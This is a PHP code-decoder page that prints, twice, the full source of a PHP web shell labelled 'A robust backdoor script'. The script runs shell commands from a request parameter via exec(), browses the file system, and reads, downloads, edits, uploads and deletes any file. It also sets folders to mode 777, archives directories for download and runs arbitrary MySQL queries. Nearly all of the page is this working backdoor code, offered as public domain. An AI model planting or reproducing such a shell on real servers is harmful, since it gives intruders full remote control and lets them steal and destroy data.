Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/..

Decoded Output download

<?php 
// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/ [3-15-2011] 
// This code is public domain and may be used in part or in full for any legal purpose. I would still appreciate a mention though :). 
 
function isLinux($path) 
{ 
    return (substr($path,0,1)=="/" ? true : false); 
} 
function getSlashDir($isLinux) 
{ 
    return($isLinux ? '/' : '\'); 
} 
//See if we are on Linux or Windows becuase the paths have to be processed differently 
$cwd=getcwd(); 
$isLinux=isLinux($cwd); 
if(!$isLinux) 
{ 
    $driveLetter=substr($cwd,0,1); 
} 
$slash=getSlashDir($isLinux); 
$parts=explode($slash,$cwd); 
$rootDir=($isLinux ? $slash : ($driveLetter . ':' . $slash)); 
 
function cleanPath($path,$isLinux) 
{ 
    $slash=getSlashDir($isLinux); 
    $parts=explode($slash,$path); 
    foreach($parts as $key=>$val)//Process .. directories and a single . 
    { 
        if($val=="..") 
        { 
            $parts[$key]=""; 
            $lastKey=$key-1; 
            $parts[$lastKey]=""; 
        } 
        elseif($val==".") 
        { 
            $parts[$key]=""; 
        } 
    } 
    reset($parts); 
    $fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it 
    $firstPiece=true; 
    foreach($parts as $val)//Assemble the path back together 
    { 
        if($val != "") 
        { 
            $fixedPath .=  ($firstPiece ? '' : $slash) . $val; 
            $firstPiece=false; 
        } 
    } 
    if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error 
    { 
        $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash)); 
    } 
     
    //Make sure there is an ending slash 
    if(substr($fixedPath,-1)!=$slash) 
        $fixedPath .= $slash; 
    return $fixedPath; 
} 
if(isset($_REQUEST['chm'])) 
{ 
    if(!$isLinux) 
    { 
        echo "This feature only works on Linux"; 
    } 
    else 
    { 
        echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign"); 
    } 
} 
elseif(isset($_REQUEST['phpinfo'])) 
{ 
    phpinfo(); 
} 
elseif(isset($_REQUEST['dl'])) 
{ 
    if(@fopen($_REQUEST['dl'] .  $_REQUEST['file'],'r')==true) 
    { 
        $_REQUEST['dl'] .= $_REQUEST['file']; 
        if(substr($_REQUEST['dl'],0,1)==$slash) 
            $fileArr=explode($slash,$_REQUEST['dl']); 
         
        header('Content-disposition: attachment; filename=' . $_REQUEST['file']); 
        header('Content-type: application/octet-stream'); 
        readfile($_REQUEST['dl']); 
    } 
    else 
    { 
        echo $_REQUEST['dl']; 
    } 
} 
elseif(isset($_REQUEST["gz"])) 
{ 
    if(!$isLinux) 
    { 
        echo "This feature only works on Linux"; 
    } 
    else 
    { 
        $directory=$_REQUEST["gz"]; 
         
        if(substr($directory,-1)=="/") 
            $directory = substr($directory,0,-1);  
                 
        $dirParts=explode($slash,$directory); 
        $fname=$dirParts[(sizeof($dirParts)-1)]; 
         
        $archive = time(); 
         
        exec( "cd $directory; tar czf $archive *"); 
        $output=@file_get_contents($directory . "/" . $archive); 
         
        if(!$output) 
            header("Content-disposition: attachment; filename=ACCESS_PROBLEM"); 
        else 
        { 
            header("Content-disposition: attachment; filename=$fname.tgz"); 
            echo $output; 
        } 
         
        header('Content-type: application/octet-stream'); 
        @unlink($directory . "/" . $archive); 
    } 
} 
elseif(isset($_REQUEST['f'])) 
{ 
    $filename=$_REQUEST['f']; 
    $file=fopen("$filename","rb"); 
        header("Content-Type: text/plain"); 
    fpassthru($file); 
} 
elseif(isset($_REQUEST['d'])) 
{ 
    $d=$_REQUEST['d']; 
    echo "<pre>"; 
    if ($handle = opendir("$d"))  
    { 
        echo "<h2>listing of "; 
        $conString=""; 
        if($isLinux) 
            echo "<a href='?d=$slash'>$slash</a>"; 
        foreach(explode($slash,cleanPath($d,$isLinux)) as $val) 
        { 
            $conString .= $val . $slash; 
            echo "<a href='?d=$conString'>" . $val . "</a>" . ($val != "" ? $slash : ''); 
        } 
        echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d,$isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d,$isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d,$isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d,$isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />"; 
        while ($dir = readdir($handle)) 
        {  
            if (is_dir("$d$slash$dir"))  
            { 
                if($dir != "." && $dir !="..") 
                    $dirList[]=$dir; 
            } 
            else 
            { 
                if(isset($_REQUEST["hldb"])) 
                { 
                    $contents=file_get_contents("$d$slash$dir"); 
                    if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT ")) 
                    { 
                        $fileList[]=array('dir'=>$dir,'color'=>'red'); 
                    } 
                    else 
                    { 
                        $fileList[]=array('dir'=>$dir,'color'=>'black'); 
                    } 
                } 
                else 
                { 
                    $fileList[]=array('dir'=>$dir,'color'=>'black'); 
                } 
            } 
        } 
         
        echo "<a href='?d=$d$slash.'><font color=grey>.
</font></a>"; 
        echo "<a href='?d=$d$slash..'><font color=grey>..
</font></a>"; 
         
        //Some configurations throw a notice if is_array is tried with a non-existant variable 
        if(isset($dirList)) 
        if(is_array($dirList)) 
        foreach($dirList as $dir) 
        { 
                echo "<a href='?d=$d$slash$dir'><font color=grey>$dir
</font></a>"; 
        } 
         
        if(isset($fileList)) 
        if(is_array($fileList)) 
        foreach($fileList as $dir) 
        { 
            echo "<a href='?f=$d" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" .  
                 "|<a href='?dl=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Download</a>|" .  
                 "|<a href='?ef=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Edit</a>|" .  
                 "|<a href='?df=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Delete</a>| 
"; 
        } 
    }  
    else  
    echo "opendir() failed"; 
    closedir($handle); 
} 
elseif(isset($_REQUEST['c'])) 
{ 
    if( @ini_get('safe_mode') ) 
    { 
        echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />'; 
    } 
    echo "<b>Command: <I>" . $_REQUEST['c'] . "</I></b><br /><br />"; 
    trim(exec($_REQUEST['c'],$return)); 
    foreach($return as $val) 
    { 
        echo '<pre>' . htmlentities($val) . '</pre>'; 
    } 
} 
elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) 
{ 
    if(isset($_FILES["file_name"])) 
    { 
        if ($_FILES["file_name"]["error"] > 0) 
        { 
                echo "Error"; 
        } 
        else 
        { 
            $target_path = $_COOKIE["uploadDir"]; 
            if(substr($target_path,-1) != "/") 
                $target_path .= "/"; 
             
            $target_path = $target_path . basename( $_FILES['file_name']['name']);  
 
            if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) { 
                setcookie("uploadDir",""); 
                echo "The file ".  basename( $_FILES['file_name']['name']).  
                " has been uploaded"; 
            }  
            else 
            { 
                echo "Error copying file, likely a permission error."; 
            } 
        } 
    } 
    else 
    {        
        ?> 
        <form target="_blank" action="" method="GET"> 
            <input type="hidden" name="cc" value="1" /> 
            Submit this form before submitting file (will open in new window):<br /> 
            Upload Directory: <input type="text" name="dir" value="<?php echo $_REQUEST["dir"] ?>"><br /> 
            <input type="submit" value="submit" /> 
        </form> 
        <br /><br /> 
         
        <form enctype="multipart/form-data" action="" method="post"> 
        Upload file:<input name="file_name" type="file"> <input type="submit" value="Upload" /></form> 
 
        <?php 
    } 
} 
elseif(isset($_REQUEST['cc'])) 
{ 
    setcookie("uploadDir",$_GET["dir"]); 
    echo "You are OK to upload the file, don't upload files to other directories before completing this upload."; 
} 
elseif(isset($_REQUEST['mquery'])) 
{ 
    $host=$_REQUEST['host']; 
    $usr=$_REQUEST['usr']; 
    $passwd=$_REQUEST['passwd']; 
    $db=$_REQUEST['db']; 
    $mquery=$_REQUEST['mquery']; 
    @mysql_connect($host, $usr, $passwd) or die("Connection Error: " . mysql_error()); 
    mysql_select_db($db); 
    $result = mysql_query($mquery); 
    if($result!=false) 
    { 
        echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />"; 
        echo "Return Results:<br />"; 
        $first=true; 
        echo "<table border='1'>"; 
        while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) 
        { 
            if($first) 
            { 
                echo "<tr>"; 
                foreach($row as $key=>$val) 
                { 
                    echo "<td><b>$key</b></td>"; 
                } 
                echo "</tr>"; 
                reset($row); 
                $first=false; 
            } 
            echo "<tr>"; 
            foreach($row as $val) 
            { 
                echo "<td>$val</td>"; 
            } 
            echo "</tr>"; 
        } 
        echo "</table>"; 
        mysql_free_result($result); 
    } 
    else 
    { 
        echo "Query Error: " . mysql_error(); 
    } 
} 
elseif(isset($_REQUEST['df'])) 
{ 
    $_REQUEST['df'] .= $slash . $_REQUEST['file']; 
    if(@unlink($_REQUEST['df'])) 
    { 
            echo "File deleted"; 
    } 
    else 
    { 
            echo "Error deleting file"; 
    } 
} 
elseif(isset($_REQUEST['ef'])) 
{ 
?> 
<script type="text/javascript"> 
  <!-- 
 
  var key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; 
 
  function encode64(inpStr)  
  { 
     inpStr = escape(inpStr); 
     var output = ""; 
     var chr1, chr2, chr3 = ""; 
     var enc1, enc2, enc3, enc4 = ""; 
     var i = 0; 
 
     do { 
        chr1 = inpStr.charCodeAt(i++); 
        chr2 = inpStr.charCodeAt(i++); 
        chr3 = inpStr.charCodeAt(i++); 
 
        enc1 = chr1 >> 2; 
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); 
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); 
        enc4 = chr3 & 63; 
 
        if (isNaN(chr2))  
        { 
           enc3 = enc4 = 64; 
        }  
        else if (isNaN(chr3))  
        { 
           enc4 = 64; 
        } 
 
        output = output + 
           key.charAt(enc1) + 
           key.charAt(enc2) + 
           key.charAt(enc3) + 
           key.charAt(enc4); 
        chr1 = chr2 = chr3 = enc1 = enc2 = enc3 = enc4 = ""; 
     } while (i < inpStr.length); 
 
     return output; 
  } 
 
  //--></script> 
 
  <?php 
    $_REQUEST['ef'] .= $_REQUEST['file'];  
    if(isset($_POST["newcontent"])) 
    { 
        $_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"])); 
        $stream=@fopen($_REQUEST['ef'],"w"); 
         
        if($stream) 
        { 
            fwrite($stream,$_POST["newcontent"]); 
            echo "Write sucessful"; 
        } 
        else 
        { 
            echo "Could not write to file"; 
        } 
        fclose($stream); 
    } 
    ?> 
    <form action="" name="f" method="POST"> 
    <textarea wrap="off" rows="40" cols="130" name="newcontent"><?php echo file_get_contents($_REQUEST['ef']) ?></textarea><br /> 
    <input type="submit" value="I base64 encoded it myself, dont run script" /><br /> 
    <input type="submit" value="Change (requires javascript to work)"  onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" /> 
    </form> 
    <?php 
} 
else 
{ 
?> 
<b>Server Information:</b><br /> 
<i> 
Operating System: <?php echo PHP_OS ?><br /> 
PHP Version: <?php echo PHP_VERSION ?><br /> 
<a href="?phpinfo=true">View phpinfo</a> 
</i> 
<br /> 
<br /> 
<b>Directory Traversal</b><br /> 
<a href="?d=<?php echo getcwd() ?>"><b>Go to current working directory</b></a> <br /> 
<a href="?d=<?php echo $rootDir ?>"><b>Go to root directory</b></a> <br /> 
<b>Go to any directory:</b> <form action="" method="GET"><input type="text" name="d" value="<?php echo $rootDir ?>" /><input type="submit" value="Go" /></form> 
 
 
 
<hr>Execute MySQL Query: 
<form action="" METHOD="GET" > 
<table> 
<tr><td>host</td><td><input type="text" name="host"value="localhost"> </td></tr> 
<tr><td>user</td><td><input type="text" name="usr" value="root"> </td></tr> 
<tr><td>password</td><td><input type="text" name="passwd"> </td></tr> 
<tr><td>database</td><td><input type="text" name="db"> </td></tr> 
<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea> </td></tr> 
<tr><td colspan="2"><input type="submit" value="execute"></td></tr> 
</table> 
</form> 
<hr> 
<pre><form action="" METHOD="GET" >Execute Shell Command (safe mode is <?php echo (@ini_get('safe_mode') ? 'on' : 'off') ?>): <input type="text" name="c"><input type="submit" value="Go"></form>  
<?php 
} 
//Intentionally left open to avoid output the file download function 1 
 
 ?>

Did this file decode correctly?

Original Code

<?php
// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/ [3-15-2011]
// This code is public domain and may be used in part or in full for any legal purpose. I would still appreciate a mention though :).

function isLinux($path)
{
    return (substr($path,0,1)=="/" ? true : false);
}
function getSlashDir($isLinux)
{
    return($isLinux ? '/' : '\\');
}
//See if we are on Linux or Windows becuase the paths have to be processed differently
$cwd=getcwd();
$isLinux=isLinux($cwd);
if(!$isLinux)
{
    $driveLetter=substr($cwd,0,1);
}
$slash=getSlashDir($isLinux);
$parts=explode($slash,$cwd);
$rootDir=($isLinux ? $slash : ($driveLetter . ':' . $slash));

function cleanPath($path,$isLinux)
{
    $slash=getSlashDir($isLinux);
    $parts=explode($slash,$path);
    foreach($parts as $key=>$val)//Process .. directories and a single .
    {
        if($val=="..")
        {
            $parts[$key]="";
            $lastKey=$key-1;
            $parts[$lastKey]="";
        }
        elseif($val==".")
        {
            $parts[$key]="";
        }
    }
    reset($parts);
    $fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it
    $firstPiece=true;
    foreach($parts as $val)//Assemble the path back together
    {
        if($val != "")
        {
            $fixedPath .=  ($firstPiece ? '' : $slash) . $val;
            $firstPiece=false;
        }
    }
    if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error
    {
        $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash));
    }
    
    //Make sure there is an ending slash
    if(substr($fixedPath,-1)!=$slash)
        $fixedPath .= $slash;
    return $fixedPath;
}
if(isset($_REQUEST['chm']))
{
    if(!$isLinux)
    {
        echo "This feature only works on Linux";
    }
    else
    {
        echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign");
    }
}
elseif(isset($_REQUEST['phpinfo']))
{
    phpinfo();
}
elseif(isset($_REQUEST['dl']))
{
    if(@fopen($_REQUEST['dl'] .  $_REQUEST['file'],'r')==true)
    {
        $_REQUEST['dl'] .= $_REQUEST['file'];
        if(substr($_REQUEST['dl'],0,1)==$slash)
            $fileArr=explode($slash,$_REQUEST['dl']);
        
        header('Content-disposition: attachment; filename=' . $_REQUEST['file']);
        header('Content-type: application/octet-stream');
        readfile($_REQUEST['dl']);
    }
    else
    {
        echo $_REQUEST['dl'];
    }
}
elseif(isset($_REQUEST["gz"]))
{
    if(!$isLinux)
    {
        echo "This feature only works on Linux";
    }
    else
    {
        $directory=$_REQUEST["gz"];
        
        if(substr($directory,-1)=="/")
            $directory = substr($directory,0,-1); 
                
        $dirParts=explode($slash,$directory);
        $fname=$dirParts[(sizeof($dirParts)-1)];
        
        $archive = time();
        
        exec( "cd $directory; tar czf $archive *");
        $output=@file_get_contents($directory . "/" . $archive);
        
        if(!$output)
            header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
        else
        {
            header("Content-disposition: attachment; filename=$fname.tgz");
            echo $output;
        }
        
        header('Content-type: application/octet-stream');
        @unlink($directory . "/" . $archive);
    }
}
elseif(isset($_REQUEST['f']))
{
    $filename=$_REQUEST['f'];
    $file=fopen("$filename","rb");
        header("Content-Type: text/plain");
    fpassthru($file);
}
elseif(isset($_REQUEST['d']))
{
    $d=$_REQUEST['d'];
    echo "<pre>";
    if ($handle = opendir("$d")) 
    {
        echo "<h2>listing of ";
        $conString="";
        if($isLinux)
            echo "<a href='?d=$slash'>$slash</a>";
        foreach(explode($slash,cleanPath($d,$isLinux)) as $val)
        {
            $conString .= $val . $slash;
            echo "<a href='?d=$conString'>" . $val . "</a>" . ($val != "" ? $slash : '');
        }
        echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d,$isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d,$isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d,$isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d,$isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />";
        while ($dir = readdir($handle))
        { 
            if (is_dir("$d$slash$dir")) 
            {
                if($dir != "." && $dir !="..")
                    $dirList[]=$dir;
            }
            else
            {
                if(isset($_REQUEST["hldb"]))
                {
                    $contents=file_get_contents("$d$slash$dir");
                    if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT "))
                    {
                        $fileList[]=array('dir'=>$dir,'color'=>'red');
                    }
                    else
                    {
                        $fileList[]=array('dir'=>$dir,'color'=>'black');
                    }
                }
                else
                {
                    $fileList[]=array('dir'=>$dir,'color'=>'black');
                }
            }
        }
        
        echo "<a href='?d=$d$slash.'><font color=grey>.\n</font></a>";
        echo "<a href='?d=$d$slash..'><font color=grey>..\n</font></a>";
        
        //Some configurations throw a notice if is_array is tried with a non-existant variable
        if(isset($dirList))
        if(is_array($dirList))
        foreach($dirList as $dir)
        {
                echo "<a href='?d=$d$slash$dir'><font color=grey>$dir\n</font></a>";
        }
        
        if(isset($fileList))
        if(is_array($fileList))
        foreach($fileList as $dir)
        {
            echo "<a href='?f=$d" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" . 
                 "|<a href='?dl=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Download</a>|" . 
                 "|<a href='?ef=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Edit</a>|" . 
                 "|<a href='?df=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Delete</a>| \n";
        }
    } 
    else 
    echo "opendir() failed";
    closedir($handle);
}
elseif(isset($_REQUEST['c']))
{
    if( @ini_get('safe_mode') )
    {
        echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';
    }
    echo "<b>Command: <I>" . $_REQUEST['c'] . "</I></b><br /><br />";
    trim(exec($_REQUEST['c'],$return));
    foreach($return as $val)
    {
        echo '<pre>' . htmlentities($val) . '</pre>';
    }
}
elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"]))
{
    if(isset($_FILES["file_name"]))
    {
        if ($_FILES["file_name"]["error"] > 0)
        {
                echo "Error";
        }
        else
        {
            $target_path = $_COOKIE["uploadDir"];
            if(substr($target_path,-1) != "/")
                $target_path .= "/";
            
            $target_path = $target_path . basename( $_FILES['file_name']['name']); 

            if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) {
                setcookie("uploadDir","");
                echo "The file ".  basename( $_FILES['file_name']['name']). 
                " has been uploaded";
            } 
            else
            {
                echo "Error copying file, likely a permission error.";
            }
        }
    }
    else
    {       
        ?>
        <form target="_blank" action="" method="GET">
            <input type="hidden" name="cc" value="1" />
            Submit this form before submitting file (will open in new window):<br />
            Upload Directory: <input type="text" name="dir" value="<?php echo $_REQUEST["dir"] ?>"><br />
            <input type="submit" value="submit" />
        </form>
        <br /><br />
        
        <form enctype="multipart/form-data" action="" method="post">
        Upload file:<input name="file_name" type="file"> <input type="submit" value="Upload" /></form>

        <?php
    }
}
elseif(isset($_REQUEST['cc']))
{
    setcookie("uploadDir",$_GET["dir"]);
    echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";
}
elseif(isset($_REQUEST['mquery']))
{
    $host=$_REQUEST['host'];
    $usr=$_REQUEST['usr'];
    $passwd=$_REQUEST['passwd'];
    $db=$_REQUEST['db'];
    $mquery=$_REQUEST['mquery'];
    @mysql_connect($host, $usr, $passwd) or die("Connection Error: " . mysql_error());
    mysql_select_db($db);
    $result = mysql_query($mquery);
    if($result!=false)
    {
        echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />";
        echo "Return Results:<br />";
        $first=true;
        echo "<table border='1'>";
        while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
        {
            if($first)
            {
                echo "<tr>";
                foreach($row as $key=>$val)
                {
                    echo "<td><b>$key</b></td>";
                }
                echo "</tr>";
                reset($row);
                $first=false;
            }
            echo "<tr>";
            foreach($row as $val)
            {
                echo "<td>$val</td>";
            }
            echo "</tr>";
        }
        echo "</table>";
        mysql_free_result($result);
    }
    else
    {
        echo "Query Error: " . mysql_error();
    }
}
elseif(isset($_REQUEST['df']))
{
    $_REQUEST['df'] .= $slash . $_REQUEST['file'];
    if(@unlink($_REQUEST['df']))
    {
            echo "File deleted";
    }
    else
    {
            echo "Error deleting file";
    }
}
elseif(isset($_REQUEST['ef']))
{
?>
<script type="text/javascript">
  <!--

  var key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

  function encode64(inpStr) 
  {
     inpStr = escape(inpStr);
     var output = "";
     var chr1, chr2, chr3 = "";
     var enc1, enc2, enc3, enc4 = "";
     var i = 0;

     do {
        chr1 = inpStr.charCodeAt(i++);
        chr2 = inpStr.charCodeAt(i++);
        chr3 = inpStr.charCodeAt(i++);

        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2)) 
        {
           enc3 = enc4 = 64;
        } 
        else if (isNaN(chr3)) 
        {
           enc4 = 64;
        }

        output = output +
           key.charAt(enc1) +
           key.charAt(enc2) +
           key.charAt(enc3) +
           key.charAt(enc4);
        chr1 = chr2 = chr3 = enc1 = enc2 = enc3 = enc4 = "";
     } while (i < inpStr.length);

     return output;
  }

  //--></script>

  <?php
    $_REQUEST['ef'] .= $_REQUEST['file']; 
    if(isset($_POST["newcontent"]))
    {
        $_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
        $stream=@fopen($_REQUEST['ef'],"w");
        
        if($stream)
        {
            fwrite($stream,$_POST["newcontent"]);
            echo "Write sucessful";
        }
        else
        {
            echo "Could not write to file";
        }
        fclose($stream);
    }
    ?>
    <form action="" name="f" method="POST">
    <textarea wrap="off" rows="40" cols="130" name="newcontent"><?php echo file_get_contents($_REQUEST['ef']) ?></textarea><br />
    <input type="submit" value="I base64 encoded it myself, dont run script" /><br />
    <input type="submit" value="Change (requires javascript to work)"  onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
    </form>
    <?php
}
else
{
?>
<b>Server Information:</b><br />
<i>
Operating System: <?php echo PHP_OS ?><br />
PHP Version: <?php echo PHP_VERSION ?><br />
<a href="?phpinfo=true">View phpinfo</a>
</i>
<br />
<br />
<b>Directory Traversal</b><br />
<a href="?d=<?php echo getcwd() ?>"><b>Go to current working directory</b></a> <br />
<a href="?d=<?php echo $rootDir ?>"><b>Go to root directory</b></a> <br />
<b>Go to any directory:</b> <form action="" method="GET"><input type="text" name="d" value="<?php echo $rootDir ?>" /><input type="submit" value="Go" /></form>



<hr>Execute MySQL Query:
<form action="" METHOD="GET" >
<table>
<tr><td>host</td><td><input type="text" name="host"value="localhost"> </td></tr>
<tr><td>user</td><td><input type="text" name="usr" value="root"> </td></tr>
<tr><td>password</td><td><input type="text" name="passwd"> </td></tr>
<tr><td>database</td><td><input type="text" name="db"> </td></tr>
<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea> </td></tr>
<tr><td colspan="2"><input type="submit" value="execute"></td></tr>
</table>
</form>
<hr>
<pre><form action="" METHOD="GET" >Execute Shell Command (safe mode is <?php echo (@ini_get('safe_mode') ? 'on' : 'off') ?>): <input type="text" name="c"><input type="submit" value="Go"></form> 
<?php
}
//Intentionally left open to avoid output the file download function 1

Function Calls

getcwd 1

Variables

None

Stats

MD5 ab2858f58145698649337be1721670c9
Eval Count 0
Decode Time 125 ms